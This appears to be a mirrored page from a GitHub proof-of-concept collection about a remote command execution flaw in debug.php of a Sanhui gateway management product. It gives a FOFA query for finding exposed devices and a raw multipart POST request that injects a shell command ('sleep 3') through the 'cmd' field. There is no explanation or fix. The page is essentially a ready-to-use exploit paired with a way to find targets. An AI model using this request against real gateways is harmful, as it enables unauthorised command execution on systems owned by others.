mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
32 lines
599 B
Markdown
32 lines
599 B
Markdown
# 三汇网关管理软件debug.php远程命令执行漏洞
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
```yaml
|
|
body="text ml10 mr20" && title="网关管理软件"
|
|
```
|
|
|
|
## poc
|
|
|
|
```yaml
|
|
POST /debug.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
|
|
|
|
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
|
|
Content-Disposition: form-data; name="comdtype"
|
|
|
|
1
|
|
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
|
|
Content-Disposition: form-data; name="cmd"
|
|
|
|
sleep 3
|
|
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
|
|
Content-Disposition: form-data; name="run"
|
|
|
|
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--
|
|
```
|
|
|